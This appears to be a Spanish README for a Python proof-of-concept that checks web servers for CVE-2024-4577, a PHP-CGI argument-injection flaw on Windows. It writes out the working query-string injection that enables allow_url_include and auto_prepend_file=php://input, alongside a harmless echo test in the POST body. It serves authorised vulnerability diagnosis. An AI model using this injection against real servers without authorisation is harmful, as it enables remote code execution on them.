
Script PoC en Python para probar la vulnerabilidad CVE-2024-4577 en PHP CGI mediante inyección en la cadena de consulta y carga útil POST, determinando la susceptibilidad del servidor.
Este script de Python es una herramienta simple PoC (Prueba de Concepto) para diagnosticar la vulnerabilidad más reciente de PHP CVE-2024-4577.
⚠️ Esta herramienta se proporciona con fines de diagnóstico de seguridad y debe usarse solo en sistemas propios o en objetivos con autorización previa.
Esta vulnerabilidad ocurre cuando PHP se ejecuta en modo CGI en un entorno Windows, permitiendo inyectar configuraciones arbitrarias de PHP y desencadenar la ejecución de código mediante la evasión de caracteres multibyte.
Este script envía solicitudes POST al URL objetivo con payloads de evasión basados en cadena de consulta y código PHP para determinar si es vulnerable.
python3 --version
pip install requests
python3 cve_2024_4577_test.py
Ejemplo de entrada:
http://192.168.0.10/index.php
O simplemente ingresando la ruta raíz se procesará automáticamente
http://192.168.0.10
✅ [✅] Vulnerable: el servidor ejecutó código PHP.
→ El servidor es vulnerable.
✔️ [✔️] No vulnerable o bloqueado
→ Se recibió respuesta pero no se explotó la vulnerabilidad.
❌ [❌] Fallo en la solicitud: ...
→ Error de conexión, tiempo de espera, etc. Prueba fallida.
Inserción de cadena de evasión de vulnerabilidad:
?%ADd+allow_url_include=1+%ADd+auto_prepend_file=php://input
Inserción de código PHP en el cuerpo POST:
<?php echo 'CVE-2024-4577-TEST'; ?>
Si el servidor ejecuta este código, la respuesta contendrá esa cadena, lo que permite determinar la vulnerabilidad.
Este script se proporciona solo con fines educativos y de investigación de seguridad. Escanear o probar sistemas no autorizados es ilegal. El usuario asume toda la responsabilidad.
| Nombre de archivo | Descripción |
|---|---|
cve_2024_4577_test.py | Script de Python para prueba de vulnerabilidad |
README.md | Documento de uso y explicación (este archivo) |
LICENSE.txt |
Reporte errores o sugerencias por correo electrónico o mediante un PR.
Este proyecto está bajo la licencia MIT - consulte el archivo LICENSE para más detalles. Copyright (c) 2025 KimJuhyeong95